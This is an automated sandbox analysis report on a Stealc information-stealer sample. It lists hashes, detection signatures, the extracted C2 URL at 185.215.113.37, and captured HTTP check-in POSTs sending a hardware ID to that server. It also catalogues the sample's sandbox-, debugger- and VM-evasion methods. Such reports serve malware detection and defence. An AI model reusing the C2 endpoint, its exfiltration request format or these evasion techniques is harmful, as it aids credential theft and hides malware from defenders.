Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528224
MD5:c1a82a310c9dc31947dfae1e6136dc46
SHA1:a9868cf5ede614df7911b1e62b5d20a04fc4c259
SHA256:35ce1834e64cfffdd4729c0254790e7aca014b3013733ccf872907d8d04e2b2b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C1A82A310C9DC31947DFAE1E6136DC46)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6636JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6636JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.610000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T17:08:19.270990+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.610000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0061C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00617240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00617240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00619AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00619AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00619B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00619B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00628EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00628EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00624910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0061DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0061E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00624570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0061ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0061BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0061DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00623EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00623EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0061F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 36 39 44 30 35 37 38 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="hwid"94369D0578E64120021454------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="build"doma------AAEGHJKJKKJDHIDHJKJD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00614880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00614880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 36 39 44 30 35 37 38 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="hwid"94369D0578E64120021454------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="build"doma------AAEGHJKJKKJDHIDHJKJD--
                Source: file.exe, 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/9
                Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/U
                Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1876333554.0000000001166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJD
                Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpObL

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD0920_2_009CD092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091014B0_2_0091014B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C0A820_2_009C0A82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BDAAB0_2_009BDAAB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C9A3A0_2_009C9A3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EF31C0_2_008EF31C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CEB0F0_2_009CEB0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A63280_2_008A6328
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D04B40_2_009D04B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D55C30_2_009D55C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CB5780_2_009CB578
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094DEB80_2_0094DEB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F0FEF0_2_008F0FEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D1F2E0_2_009D1F2E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006145C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xchtnbzm ZLIB complexity 0.9942755126953124
                Source: file.exe, 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00629600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00623720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00623720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NZUVIS6P.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1794560 > 1048576
                Source: file.exeStatic PE information: Raw size of xchtnbzm is bigger than: 0x100000 < 0x190000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.610000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xchtnbzm:EW;hubelpjq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xchtnbzm:EW;hubelpjq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00629860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c534f should be: 0x1c0df6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xchtnbzm
                Source: file.exeStatic PE information: section name: hubelpjq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A438A4 push 4CB5EC42h; mov dword ptr [esp], edx0_2_00A438CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A438A4 push ecx; mov dword ptr [esp], 653A3DE7h0_2_00A4390A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 6C494A40h; mov dword ptr [esp], esi0_2_009CD0B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 338725C1h; mov dword ptr [esp], edi0_2_009CD104
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push esi; mov dword ptr [esp], edx0_2_009CD20F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push edx; mov dword ptr [esp], esi0_2_009CD30E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 1B9FFBA0h; mov dword ptr [esp], ebx0_2_009CD384
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push ecx; mov dword ptr [esp], 575939B2h0_2_009CD3D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 5C4623AFh; mov dword ptr [esp], ecx0_2_009CD3E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 1DB89F38h; mov dword ptr [esp], ebp0_2_009CD421
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push esi; mov dword ptr [esp], edx0_2_009CD483
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 0EB02C0Ch; mov dword ptr [esp], esi0_2_009CD501
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 1A28D500h; mov dword ptr [esp], eax0_2_009CD536
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push edx; mov dword ptr [esp], edi0_2_009CD565
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push edx; mov dword ptr [esp], esi0_2_009CD5A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push esi; mov dword ptr [esp], edx0_2_009CD606
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 304017E2h; mov dword ptr [esp], eax0_2_009CD647
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 0438F027h; mov dword ptr [esp], esi0_2_009CD698
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 4D5DAF59h; mov dword ptr [esp], eax0_2_009CD7EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push edx; mov dword ptr [esp], ecx0_2_009CD80D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push ebp; mov dword ptr [esp], eax0_2_009CD81D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push esi; mov dword ptr [esp], 7B39D1FCh0_2_009CD88E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push edi; mov dword ptr [esp], 0B01D83Ah0_2_009CD964
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 539A6890h; mov dword ptr [esp], ebp0_2_009CD97B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 2A61F6ECh; mov dword ptr [esp], ecx0_2_009CD99F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 18ED2921h; mov dword ptr [esp], ecx0_2_009CD9F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push ebp; mov dword ptr [esp], 1D705A70h0_2_009CDA5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 0791D95Fh; mov dword ptr [esp], edx0_2_009CDBB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 79586527h; mov dword ptr [esp], edi0_2_009CDBD1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push esi; mov dword ptr [esp], ebx0_2_009CDC68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD092 push 22441FF3h; mov dword ptr [esp], edi0_2_009CDC8C
                Source: file.exeStatic PE information: section name: xchtnbzm entropy: 7.9517025024735215

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00629860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13211
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC986 second address: 9DC98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE5EC second address: 9CE5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE5F0 second address: 9CE5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE5FB second address: 9CE602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB9D8 second address: 9DB9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBCAB second address: 9DBCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF64 second address: 9DBF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC2A7 second address: 9DC2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0C44D4E186h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC2B2 second address: 9DC2DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0C44E7DD66h 0x00000009 jmp 00007F0C44E7DD78h 0x0000000e jnl 00007F0C44E7DD66h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
